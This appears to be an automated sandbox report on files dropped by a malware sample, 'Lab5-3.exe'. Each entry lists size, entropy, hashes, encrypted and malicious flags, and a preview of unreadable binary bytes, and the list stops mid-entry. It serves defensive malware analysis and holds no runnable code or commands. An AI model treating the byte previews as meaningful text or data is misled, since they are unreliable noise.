                                                                                                          Preview:./.'w.x....y...B....HS$n2..:J...^M..uG.s.'......b.|..W.....!....o5.*.{.>.....f{....r..y.V.v.s{...2~..x.(:B^...sJ..(t.}!L.dw..$.....X...0hW`..2...$.3`....V...a..:<.c..cY......;....$.w..0.V.....8..6R1*.....`%..t..j..l"%.:.q~>.Qt.....(.&....63.d...r...Ym.a.Y.c%.X....U.Z...Jp....8C...~1...z,.."........uu....}...V.FS...>CX........%0....EM-.VxOf.JX.*!...._q..:.bz......,.k`....p..R./wQa=Otll_....;L.oY.(....LMiA..x..,.B.$. G..>Y..-.c=..h.H.%2.,0..;FK...~..$.&.......][...6..%.%..O".f.l.o.tX...E...2...............u.......QMDl.(..8...p......DI{8Ix.....h...^.8..(...".i%_....U.....{...}.iY.%/..jQ.7u~Znc..=-....O....X.T...s:..r..T...o6o3 .C.F..a..Z.4....w...!S........G.5t...%.....H.Y......N.C2...lx.1.h.z1...'....._=..~vZ..A.~."...../P..Nh.Y......*.e....X.}^0U!a.X..VX...s.F/...i..q|H..D.ch...c9".[...K7.......P.S........$....I.k.*..V...>K..n=C..wZ.M.0r,g.?.\...u..l..0.||.K....>.v..^.....t...~').O.&......D.....m....W.a.~...].V..H...J..[..Um......<.g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7456
                                                                                                          Entropy (8bit):7.970156081625043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Ejyf1kwl4YKph8LpBHLgqc8vva93IP50Cb:P1Vynho9c8vSxytb
                                                                                                          MD5:FA89E0DDD2381F478035DFA9015AE33B
                                                                                                          SHA1:F96A081394DBDF59F528B575C5AF6571AC9C9742
                                                                                                          SHA-256:7C2536E330958C676839F439008FF314B26B4A21B56626B65FA51D69AD2E7C09
                                                                                                          SHA-512:1BE50F1D5FA944E7385ED532C0A1F76645F666266F431B571FE14241A83D26B9AE8DFDA64DC9A5C573D98669D58B6D518817791E4B26194C497AE4BB26E3A1D7
                                                                                                          Malicious:false
                                                                                                          Preview:..s!..c.@{.g..t|.C(.>,q~N...{..{.RS....0.V\e.NA..i.'.9].J....S....o....E.+...Y...vy-.....7.e!.H ......|..%.`...."...o[.....{[u..(..fuX.P..7.....lp..+..!.X......P<Q9O.. )L/J.........q...$......\.4.8d..D..LLu...b..<0W!.....]...W.b....4]49....X.Gj~.O..lBQ.+?.E9t..t..swv........I..K#..+.KC^.`.{..L.e..;...z..xGF.......r.W...'...dt.......$ ...aM.X7.D>...#@=.......%.G....Ge.....2.h>l.......&Qa.O..>..HQ.%...._`^!?.@.{..]>r.............L..lE....&\.....*..s...%...WS.|....H.7...r....!.&l..'X.....E.).%..G7J..mH~.A.W....<.....L.(.hb...?C9./X.F1..'..g..f'D. p..=...nh.....M..... i.....5.\...}.h.C\..p.-X.|=#.\6..5g3..?8.JQ...]...Q^.0.+....7...*......25C.....G.c.|P.....-;k|..W.ST]........L....s...y.|.T... ..o..Wvd.k.i_........ ......X-....O.8...!..u..,..R<..c._8.....F.........#......S..&..,`.,6.....;..>..bRa...%.D....~/.#.po..q]KrD.9^^.KX,..y..+ q.....~....].H`f..c.bs..r(2.....v...*.B...jH.X.8`...A.....M.Ds......`_.x.Y5z....a.....XR..z(..hz...7.d.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68672
                                                                                                          Entropy (8bit):7.997637474708255
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:yvfRLTV4PqyhnW7rKVBj2fGCJeqxK8lcgx2cCgH6dAZ:yvJdEVhnsrmluTKKggaqZ
                                                                                                          MD5:BE2E77A994BFC002078AE118242B9340
                                                                                                          SHA1:B2B18240F4C93AC593676EAADA1683F56A4D652C
                                                                                                          SHA-256:68183959558AB0BBE7643140C0E9444B6866C752FEA05914300576DA7673DBE1
                                                                                                          SHA-512:22986162B41A373B45EC61045D2C971FCE40043752CA52076B06BEFEE12452E551FA50E72090AAD92A09302DC563B2F1A032523BBEA56F93A8A06CDC53104BD8
                                                                                                          Malicious:true
                                                                                                          Preview:............$vn.`BZ.0..D....!.q.....~.(n.N[..D..B_.Z]A....1.L....K..lh..aL..<..uSn.A.v.7....^W.......|...b]. .....a60.>J.1.6.R..fH.0'..Z...........!8..#rq.....I..F.....$..cI.....7./...Z..{.+..t.^I7_O.z+z.O...g....R....39.z$.6..........].....F.....l+[.8h......m.*('.y.tFm?.[.D..t.e..V..1XebQ}O."... w..v.1zs..d...g%....<..' .~!H.._.,9iz#?.{`R...I.S.)..$.es..-Oe.....# ;}D.Zp.p.fJ&...~.'.n:..+3..{.=...D....9........i.O.....\/.9..4.....I..k.m.B<....Nq.....Z.G.....4-._F...y....s6$..I/....-.x.f..0......E..r.2.........\M.(....../.H.T7 ...\<2..J1.%..b.....Rmwf.'.B..2.*..j.L.....T{.L...r\.3.........e+C]...~...i%....8I..|..>~..b..,O..8....).VYK.&.#..3oBz9......7./a.....,l......q*.2.....&G.l....J2.d. ......#}...(~...b<#b6...^..}.K....n.Y./2TV..lh.D*Y...gN.b<.MM.u.x.>,.=?,..j..#.]]......,.....\u.#...K..o..c.~..Nc....!..P..co.@,5.w..H...l..^h<..$.."h."+.[...>..VH.64b..L.^|...?s.0H..z.]".2.#....&..x.m....5.".k.r........8..Eg.eZ...4.1.I.....>......v.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):235440
                                                                                                          Entropy (8bit):7.9992727998678435
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:3aFAfFWKllNbG30O0x+fas4KAW97aPUtJzbS+kOz5W85aWZ:3aII0bG351asb97aPUtlbLS8aa
                                                                                                          MD5:2FDF3FABE43206DB4B60305CE995C730
                                                                                                          SHA1:7F2AF1BBE740BDD3578006F4AB66D7E58CC16F55
                                                                                                          SHA-256:3FD6559A205386F2568CEBFE27D951565A75EA5D01CB0559BC8C40EEBD42EE67
                                                                                                          SHA-512:264A8D332976FF2AAA81072708572F71F2A69C3F7AC616EEC2064F95AAF5D9C4ED660D9BC23877FA9F70C31F282D064CEA343AA088A3C88445655D74466A54F5
                                                                                                          Malicious:true
                                                                                                          Preview:...."...N..L..-.>'.M....\...2....b.a...'.T..M......b.J.5..mk'.w.n.t~F...0,../.}.........".@.zrs0....7.*..n..t...m4n".IJ..r1...@.t..n.X.%z..Lj.H...i......3....5...6..X&.*...w.C,..1:....S.......W...`.=....m1.N..Hae.......?.Wg..eH.m..]...t>H......<.o.W...{:..Z....G....D-|x..}.Y..y......R."?&.Mug.~NiHYs.%..Xx$.%.)...).?,..odG]..9.k........{....n(....4...C^.JR...g..n$J....C...,..:.}......j....G\.S ..G...y.$.{@j.-Q_b..w.Wkp.#<.1..b...M..B.3.F.!..6.-...2r_v.^.<-...M.\#'...W.$.x.NP.q...E......\.l|.....0-.72.~..5RR..h5.....d}......u....Y...."Y......9.....z.....=~QL.{..?...oK._d9'.&..%.a..6.....?..G..<\.L.nW.e. c?;.".m.}P.Y..j..e......v~.W5r.....'w.>...*y| iM.d...MM9Z.p..a.;%..&u..}........W.~.).]?..M.w.X....,.]...../.Fb.@.&....._.Pm.=m.x.5ay...{.x.....)...k{e......}EYF...H..Q|..%.....OQAa..nj...n3.."...g.!...2.j.}.U..#.'I.%C...p0B7..\x.............&..$*.C.s.r.....v..v..._(6.Cn=.......H...F.T.......y.w3..I.V...$.F...[].V.+i..i..y.uw8F....k...~.y....r.#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3424
                                                                                                          Entropy (8bit):7.94949430884697
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:koElRNA5479ApEwHk71sLv1qpHJunCYVRW8Whvkr95MHfUTid3hBaUoSGFcmeykt:eNA5dpj4YSHgjW8Mo95LGx0uKeY2ElUJ
                                                                                                          MD5:6A65AAC116C6365AE25CB4EDE37B3F04
                                                                                                          SHA1:25F32DDDDD08C5248D20A9FD6D5B5C07DEB57C89
                                                                                                          SHA-256:5C13FE52D79E30AF02EC0ED4A375149D7CBB0FF91733E6B1814B6452C2C0979F
                                                                                                          SHA-512:8001AA078812F34F78C6092963D7B884652F147C2EDF55CDA3A05752B22AB461EE1118F2D2289323DE57FDF8192CEF26135D5E5EF88AEF285C95ABCCD1915331
                                                                                                          Malicious:false
                                                                                                          Preview:..j.6.j|.w4..h..3...l0.Xk!....1..)d>..v..r..v.E....>....^......VO..".......B.8..;@.Ard.x.|J....1oW.,...V...u.:.~..a.s...b..h....}.4..1...d...y~|.0...!......L....9..L.*..y..g5t..............k.QJP:Eh./t)u..%)R..&..W...m.i...:..'....5,T8.....f..d...;...J..T}!.s../..:.x...{...y.Eid....t...wp.......t..!.&u.H.......I...d8..3gnXk.(H.'.e..II..Xg..3.a..o..0....zoZ".%k"....r..m...e...mQZG.|..Od...2..;.....M......6.M..q&.......:.tE..x.2w.ck1.`.tO.o..'......\)=(....<.~G3..u.r;..+B.,Q.....Iy.h.Me./...@._.K1...qf..G......B...=.|-...v8..(..j.{...7v{.L|K.GJ......W..p<..}.E./;.8l..!TU.Ie.f$oR......e.....{.f..LJ..#;:...c.{.>o..k...fC..2........H......1.U.?...+o....x....B.O.....UT....`.Mx..k4D..}...O.0..h9..i4.9..V.v.bk..<f.N...`4.....aD.qN..Q....N.k#f.*\...H.,.B..b.f.!4.*.e..5.a2.....L..j...z.e.v..UBK7V..?....b..R`.T.Yi....}...{d......V.\g....R`U.....\.g..........g.*F}W.Y.....)'].v..X.J......;$`.iv..\..@...z..........jF.......K...*i...F^)./K4.,...!....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1680
                                                                                                          Entropy (8bit):7.897293383428339
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:AxNIdeIsbHfUTid3hBaUoSGFcmeykEdEElU92i:ArIozoGx0uKeY2ElUJ
                                                                                                          MD5:41C1E236AC47B99063A550F121CA3385
                                                                                                          SHA1:4850FC661D337FA3EDD91DB6EFF1E4355C9A86DF
                                                                                                          SHA-256:BFB6EC0CEABEFDF9919DFC29660AD1D563BCC877242FF75290019C59E9A8FC73
                                                                                                          SHA-512:AE9873C392D432F6A494E198DCE064CD717DA6AAFFD5779CFAA8440DED341B0AAF90FB1DC29A72F6DD295DDE5E9670DA964945524B2615A10EEBDD6E2FFA5061
                                                                                                          Malicious:false
                                                                                                          Preview:s.'.........e..?.....te......\j+=.fP.`.f.e....?.;..w&...T{y.....p.@.+iy.3({.t...k..6..m.....Y.W8....b.[x..T.^WW ...,..*.qxQC/....7:7.....Y{.<,....X..'.Ce...n....42.Ew{..g..~.....9...il.s.Nm.......M.......}.Z...R..X"..4.q..S.&....g.a.<..w..o...;...6..f......%..<.A....W....Sg..6..l..6......:.......V...,.....].$....5P6....gR&4..n.......>.........W_..../a..+#....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):127664
                                                                                                          Entropy (8bit):7.998462757036342
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:SJQQukzm2cOwCjE4rRrioZg3qLETf8LIIWTFfKCZ:SJykaJ5CjRRAT8LIF/Z
                                                                                                          MD5:2E59E4B9CD15A1334CC0D45E6B47A634
                                                                                                          SHA1:BDB57FE371AE8E616AD8EE2F3ADF90B7117A206E
                                                                                                          SHA-256:ABE09AD9C2F26D053407CB47268F60A9CCC34054BEE9EDF857064C647E2C6C2B
                                                                                                          SHA-512:F6A0776438F534C567E556BC59C4DB745B76845C5F7E80121D5D753AD88B6AC405A396B74F3C3748B3AA4A344F152B60D3DB156DBE284CC9E5BA71E602498BE7
                                                                                                          Malicious:true
                                                                                                          Preview:z.v.....88.h..W.'.mN. 5D.7..C..W.c...$...-Z....4...i.f..^..D.p|pe\,Rid..RL.id....}...L...@+.....l.3..!7.w....Q.....#U....6y:...b.r.[.O=".D'w..d:i.g.....x....$.3"..b~.q:X...0.`cC)..?/#]pt..on.>|..rA...Al....._..r4X..&?..j...u.r....U\...L.#u.X2:..4P.XH.......ZU...:....j......k\..W.ht..1.&...K..4..l...._.......A.,?...TN.>n..e.6....5=....!....wl.eo....o....C...|.\...`.ze.f...~.'...U.........-.5....~.D..k$..%.{.Sh.}.. ...8..|.Z6.Pb..k/*....W.Q.G@q....P..}P.j.,0X..f..(W.Of.....}O.g5..Z+J.5S.].$A.-.>F.....Y."u6....6.!..X....}Xb.i..z.un..K.6..=.K......v.X..\I....*.J.W..gj.\%...b....P.B....6..ouXU.......[...%...{}.@..k.I)M^#....}{)DI...s..60.......:..Q.A}.t:dwRwT...q.v..k..C}.O..y../wnU.f..7..%.....4.2..k...|.%.I.......@S.C.%..1....N.%.Rcb.....j.".W4...}N.J.......sI. ='....Q......x... ....;C.j....y!..$-...kk........:`........P..}?.x...FE.@....I.v..{..U.p.4..:...2..../.An.@.~...b.Q..2..w...eok....../c..A....s..%edjh.....T...`...H..... ......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3168
                                                                                                          Entropy (8bit):7.9483864194200935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:G1devpXBjmT6wVsT/CCD1gWGx0uKeY2ElUJ:GCvpxj+KT6Cy10Cb
                                                                                                          MD5:D7DCB123CF0A4B5645F90B69D4523F2E
                                                                                                          SHA1:5D3F9EF37C76A1EA43866E607866BE95F05EC3A3
                                                                                                          SHA-256:1FB5D7FA0883F0EDDE2475B1FCFF86F2783948204D59D8AD3B04F29CCCB94938
                                                                                                          SHA-512:A57CF7E1FFEC11EB08F6973CFE2BC0EE1EAC71C339286C23EE3F3D22A8959454505BF584C93C004F60B4CC9AA17BFFD7C25DB84C6AC683F0AE67EDBBE31B3E15
                                                                                                          Malicious:false
                                                                                                          Preview:.`.)....v..j.mE+o..b....{......Q..!...q.0...F..V.x...o.}.P......Wu..W..e..y......W.q7...x.As5....ih.p.+......J....`..nIXy...!..:f...v..k...?..g.....W.s@f...B.......SVX.._...y..K1.(.5..pB.f.(.m..Q...........,B.H.(..A..\.....OFa{&..i...!.*....L.4.S..Cj. O.t....k.<!...g..].Ci..:..A....z.>.9..........&^..<..HXE,..]`N..".'...F.._!...k..o.........>s.,..c.(._..D..k..._.oh.ES>.P....>qX.UY...2...E..?...I.#!..%.H...-R.....%.9.......5.N.^....j.;.|s.c~.$_AR..<K.kR,q.5..J.....(....3.gr....K..v.{......4....r.a..4......'clT.....?.X.vo...V.r..2.H...eo....RK:.....b.D.V.?.u..)._..7..h..<vk.b.....me.A.o..m.?..n.K.8s.p.6..'...,..."......a..A.g.c....#...,.J.aD8l.6..hP{~.0q.x.K.ae..-.Yq.....;.E...C0_..Dyf9i\...1X."...R....gT...!R@o...&....M&..;.B......./...!.+....]ByX|$..+.....5.....Si(..$.B...I...r|y5...Bb6.H..cK.@....Q?.$..4a. .V.......(7Xyi5....ep....q.oyM.....W...........X..lL/.."...].aj&H..C.Dc|.....5..~..5B$.mF.-U.y(...3j..Xy.z..8..=i.....E.*.Z...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21984
                                                                                                          Entropy (8bit):7.991299688047784
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:45J15WnfO5y4XYpY6aIZ5lKLkvadHnfCy26C4kiHnWEE1tb:45M2I436TDlEkChfC0kiHU1Z
                                                                                                          MD5:486FDBB3CA1BDA43A6CB163AEFCF9F29
                                                                                                          SHA1:F32180556F463290DE05695AE0551C39A4FA8550
                                                                                                          SHA-256:9903791D77965A3E81744731F91FEC342FFE3C9B9D95BDFC9176C651C3E7F7A5
                                                                                                          SHA-512:D176CDB70D0E493B5D822247FB8F62F20E33044AEFAF959FAB3BB58DCCF4A9C6BA5B0A881A5CE7699A91DA4967184334B1058BC910BDFB0C4648B2CE2D4947DF
                                                                                                          Malicious:true
                                                                                                          Preview:;....h..].v.P....T.E.J.H+.....<...HCM.4.m.]sX..U7Fi.....y.....Z......j...5r....E....,X@.s.....G.....}.o8.E..2.....m..99....#.......*.8.`.'@....h.&.+.E.9u.Wj....-}..>s53.\S.{E."^..p.*Z,.........p.8.lt....`:a....{..t..l..~..R..%F....L.3\?.F.gB.a.....4Q..q..^.9....~Y*.&.J.......9..............d....\.....A.?..w.....".B,#...~9..tS...E.RK...$.;.0.f.VCc/z..e....'.......IN/.)0.d=.]{n.;)0..3o9@..C.2..E.x.......X...<5..nQ7h...5.s...G.>X..!.%d.bW.|....;C...I..5#=..t.....A..!..a....F.,.....%^..3+E.c.d.-..]......{.V.....s~*.m.>2n.......}l-.........YFw...........kJ...F..T....Z.*(...0.)r.C!P...A..K......|..M.!X..3..S'...uk>l.eL}l.....\....:%tz..0"BV.ro)[d.....<.i.1.........I...B.F[..b.B..Rh.J.".8..sBx....*.`.g..r..w..7u....}.J...h.g3m+......."...D..<X.H9n.)P...\o..`..'..;....U.....k}c..R.Z...OR..D......y.V...../....T.<41.a....H|jg9.T%J..bq...M.Y...lK?...~..=IX.T]..hsUQ.2.c...^..Vv.'.L...'.E-..y...*.llR.j.& Quh. .e....W.Q4u}...y.%.[.8........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):96944
                                                                                                          Entropy (8bit):7.997898597846347
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:/F3tq8wlK5ZnkNZU3wAAOGlILCPz70dTzrFp2rC7h0yP+HbYR6Oxawh8i+Z3FHjW:/O8wGfw3IGPzwdT/IC9P+HkRTxawh8dK
                                                                                                          MD5:49C2FADA27F0B1E1DD7F77BFBACD0F9B
                                                                                                          SHA1:CF4CE513C5B3C85AB389061048493A79DD9D3484
                                                                                                          SHA-256:DCAEDBA4409D9276BF547449C062059BB6E6FEEA69BB299DDF67FE26707EBCEF
                                                                                                          SHA-512:DA3E5330E9611F144C3D8063A47816F2A5EB144592930B835D34F1D8DC20E7AB0D7D25B66882C83BC4977EAD0D6FCB1CFF3711E9C9CE3F417BC88893AC9218ED
                                                                                                          Malicious:true
                                                                                                          Preview:h..Y.*.d|`p......l..|<.....U!C1...|.....3.e........H..$@.q...T..!].)....8t^2...F.R%.{...P1:.Nd..S.oK..n..i....u.Fp4D..8q..y.>+b.c.....ZwS.{...a..0..4%........e...z.v.k..HV..h....6..v..e........._j.^.R\ORpA.-.R@.zc$..:..v^o....u..5&3>.N...aX.....M........w.......f,..r....*.M........Q.)pN_.h86...>I..h,.D..A^..v..f...9.2.).h.....-.k.eOk.w...1...2qEQGs...HA..?..o.X<.;'.............p...i...e'..W.c.......AHv.......H....H.3..q.r.V.!`.!?..ZV2".. ....~.....(<i.o.c.....?K......./...mr..~.JT.....3%.............}F.'...~.........G$.bk.0.-J..CG0~...vp......\e.{u...:...N,;n...=.iU......lt.'#V...M...>.k.W..O..wa...!..x.qUu..J)...q..Q.E.....P-....9.......PK..3....'..r../!uv..e...d..3....YU...0.9..G....m..?.t..%A...%.w.g..o.).....\b.........&.......7?..0.T3..e..z..*.En.......fGD...9vN&Zo....F..)....3|.hO.h...K|.........`|..~6...'|p+.v....t.b.A.o.....w...V....y ..S.~.>...9M.I..#.O.y....`.&..^J.rBX...T.4.....2.....h=.^..O....w*.`.......|..*.8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.99484255836921
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:MvCKqFJf9XtrIuKiPfrv+NtEhDxbbqWnsZwdM44zXoSOJQzrnVvo8YK9kuMyqC2k:uCTFJf9XyFu6Eh1nqhZs4zYSOJsDDEy9
                                                                                                          MD5:CD4094D94043CB2A4881CD29804EB047
                                                                                                          SHA1:6D0F32896E98862B695CD3FFEB8854406775F755
                                                                                                          SHA-256:B4FAB401470171D3A2991C52F268CD6E5EA1A09E6132365D70ED9C9011FAE052
                                                                                                          SHA-512:31AF8D6DDED084729767FF7710D3877F9F421578B9628B4D07CCA75313BA4CC3A93C7D7A5A5A246BAE32CB8A38E86669C8297D8236BD65EE0DC824159F6E0B47
                                                                                                          Malicious:true
                                                                                                          Preview:.t1%\....B.. 3..].N\......f.e"......\.....h.|..y.Cox..~..F!.....6........I.Ldl.6<.b*..~.!...B...0v...wu..M....u...z.]..8?....O....}(..a.s....^./..%^.^.k..@4..3..^.d$.m2}}......ET.x.r..5.$..........t..m.!+C.od.O..........>L.#......$.m7cz2.H...i...}a...[.d;..u...\_.K..,....)v..wL...]....../D./..P?.R...[.6..2...#;.c.....y.2.........Nq...%].xl......}c..J..j.H.h..ok.J.....C"..7.@........Ds..?z....X.n}.f`...._..Ak.4.....h...gWW +....N....F....b.A@..$r\...Syxb...$...^.L%."......fA.Ue....5".a.r6...i*r.{......N..(...6r.ZPX1v..T$D.1..wv.g.9m.k,.......5!&...q]..Om.6h.Q.5"..s,=.4E.......nJ...#.....^j.<S../'..>.i........\.S. G...)..U..Do.9.Y..S+.y.Ub.hU%2.-/..d..>.=c'..jOs.Y......".a.)._. V....Whj..h.N=...Xj....m....s.[M.wo<.7s...3...=..@!...K.t73...S....lbZ..f..rXZ....*..U.&....I.\.....x.h..s..."J.s..'...&....~.7.D.nn......0.&|^Q.[.g...C.2........y\.FB.qPvN~N.....2..,....3C9.O.C.j..wV...{.en..Ryj...O".$..a?....<........P.....s.dh.~....]w.2..."...r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995692491389263
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:hvYdlHdGjzGy6A4HS6a8xfzUuoMM5VDGyRbtH9IE7KE0huKTuAUZJ5KKnosZ:hvYrHT0/8xfIFf5ZGyRbTsE0YmpSxosZ
                                                                                                          MD5:25EC3D5ABDF0EA049BA2B0B647A75B26
                                                                                                          SHA1:81B343AA3A06E6641FD1BC6910BE684FEB44DCFD
                                                                                                          SHA-256:03B0AACDB2FD1917A1F7D3E3F3519241CC2EF73CC66AD7950D9B50B2B5179B69
                                                                                                          SHA-512:0AC6C4051248D126CC194D5706C04237FB06E6FDCDA206F22B22118794C8244D9FA77A28C1418282284B07F434C12A4952E822B0857E251E2EACE93175B180D7
                                                                                                          Malicious:true
                                                                                                          Preview:..h.S1.(..I.{.YK...`...H.V.M-.Y..*..w.1S.....9<=2....../.[j..Wj.7.....`....<..m.qb...X....e...&.1$.hY.0:.@....U..T.3......r@h.*.....8.E..@....A..R..jN3..N.:....4..^ ..........8...G....nC..g...9........j.E..b...../...*.h...%.[h'_Z.B*..&.>,{...2..:.Q..C.@G7.6qL.........nO%u.\.q..@\..%,.@ [.+2..I....,.;.X...........9.H&.M&z..C.......1p....\0..{.....s.;......p.B.)..A.CX.%.L.....ybp..%.c...........#,].....*."W.|....O.6....L..f.&.......)hd.4...F.v5PY.o.X..$"..........<..O.........g;V..5.-.6^h8e.....5..N...m.8\...........kLC...yY..... .ob...@7...4W/....d.{Hx..Hn.l....lz.j.d.R.k......5.....a.]..[...L.....e1c.u/c....B:y4.4s.v.|..V..&...u.b..........?ZjSg.o..>...._D.I.....'..j...Z.ds.`....`.N.....n.X_..-.(f/.MI....)<..X."...f.[T..k.3Q.K<...3.,..Xo$...Oe$.-y1*jO.:.`...".s..Mo.....=.Z....oV...n..M......[G..c,...q.-f..{...N.S.1..C..).....j.m..=......#.WU.8..(...Q.:....%[......p.. ..z..N...:..d.Y"...<..B....;..w"ov.].W.4.$..:....3.b.m....w. ^wVb....7/.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995319246640195
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:hbciz9az3ttNjXcd4fo334NjcyC3XxJhmT0wq8u8j/la5N5Wi0HiJxLnZAOSrIXb:99L6ISYLhvSTMNV2+yEUGVAQCz1KtZ
                                                                                                          MD5:35FEFFF7F446CEE15D473EAC90D87512
                                                                                                          SHA1:1C5D528A8B03E80E9784A90A43963B38BF74D274
                                                                                                          SHA-256:D519E63AC9685865C931D4D03DC84CAD7BAA174C04A754111954BF0C6A49A47C
                                                                                                          SHA-512:FDC1CB1AD96E7D8E48F42E130B78AC56A17C63F30F9195B3BA9605C61612631024280EA842C65542D53A292C27B550DFE94398A5F98333769010D0AA40931E36
                                                                                                          Malicious:true
                                                                                                          Preview:].(q...t.R1F,...k........W.f.I.>R.).....F.<V9...J$..p)=x....No.K...T|.!*..$..Z..6...m.K..=..1.....q.:sv........fj5..EE......W..z.......y....6u.]7..Fl.Hyw.2..p.5.#v..!.A<9?~.5.41.C....v=._....AE...w.y..i.44F.Z...'1..D.).gDF...tZ..].wA...u.-.`.......@....6..]_..p.w....u.....qe.ih..o...z.|..>.*4..C.....T.<H.B...WY....@.....F.6.w....% F8I..9.......e..............g7.n....|..y.Yq/M..Z...mi.e...*!1.t.. ..^..~Z..I9.[L.KQ70.5...TGp.?m...ci..J..Y..<..<r......77+.6..v..u..u.bR&y...Q.f.c.....7,......O......Q.=. ...&..!..a.3...y.,<..|...US;....Q....9.>0x...9@..d9...j<j...,N.)..&....h.O.ws...Bs-.R..s^C.r.>.d,....^.u..$...b..G.=..=..g...a............jU;2.$A..V.5.sG.J.........@.fi.bj#s....I..Ig_5u.9.Z...[.%.....A#...?_e..+E.4......qQ.....(..@$..6....w%..}.........ah.s.=.a.c......v..........J..g..6...*.b.=|.Cb.#.{..M..N.@4LVC.(l.o..F8.@....Gl;u.M.I...7M.......R..0.-..n.%^..Z....m....$..h./u.o....o..6....t...:gK....j....&...a.b.i.j....J4.z.....^..,....j..m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.995812601810948
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:3xLp857oggYRYGq5zq8+TVSXGV4cq6Jc52XLt1zl4XtyhgvOssaD3MekCeq0w0Z:3xe57r9YGq9q8IVBvJmG1Z4Xtyh7pM3Q
                                                                                                          MD5:DF5E2288195576C3AAC168AE6D5CF5AF
                                                                                                          SHA1:E81E6D47E31D13FF0EB1656CC52AE94A6ED48F62
                                                                                                          SHA-256:C55D9C8223F1088A2B3AFA03080DEC8BE471BA4EB84C4EC858A152FB8043F031
                                                                                                          SHA-512:D1CE9925ACAB54B81E5FEE6E7E70B1BB476780C5DBB86B0812EB6AE1FB291665CC1433DE6AFD3CC1F4605B38875B1F6808E298FE8041A731D0C34A78F1C58094
                                                                                                          Malicious:true
                                                                                                          Preview:..a...}Z.(V..9.u.U.:....8......K........[...'.p1.h_..!...Be#....Q.K.n..... 4e..../.3..s./.!r.\.9.#9...}a..vz..6.....|f..lC.>n..E....z7..n......y.(.f.'..`.].b..J.....oN0.".6..8y.@1!..........%e..].o..j.Y.......Tp.T..^....8.v..k.}6.'.G..`.c..[8..Y..o...Q..3.**a.$.....%....)..1..}.(..........TW..B..X..kEU.s....t..X.P].X[...psj.Dc..t...Pv.M..bE.c>.y..5*..+..{Z...k........l.T2\.].AR....y.n.!....R.c..,.i/W.!1.'..{$.F..!....q.v*N...{.6..TF{.*..F.);-n.l=......u.n....,.m.....A@4eN......Z8....3*....TpC)*....7.t..v%V..B.......2u..g....#.o..R..W_\.h.7z....Vw.....c..aC$Y.:(.dIh..\.>......A...A.+...g.(.*...7...n.....".K~uk4.eOz..)k..'.m~......<.....*..D..w.[.......f.. +p.m.J._..b!@XR..:....-..eN23=r......z.?_.v6..e...+.Zn.#O~O7X...*.?...J.C...K6..a...4.x.*...... ...yI.\.A.1..../0.~d..I:.4..^.#....t.f.......C....%...@.9........6..4*...>z...Hh.....>k..aU.....I..... .=.. ..gK..#=A;X.........1<l.<SRc.wm..h$-E.[[..TU...~4..V......u]......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38576
                                                                                                          Entropy (8bit):7.9947758660724455
                                                                                                          Encrypted:true
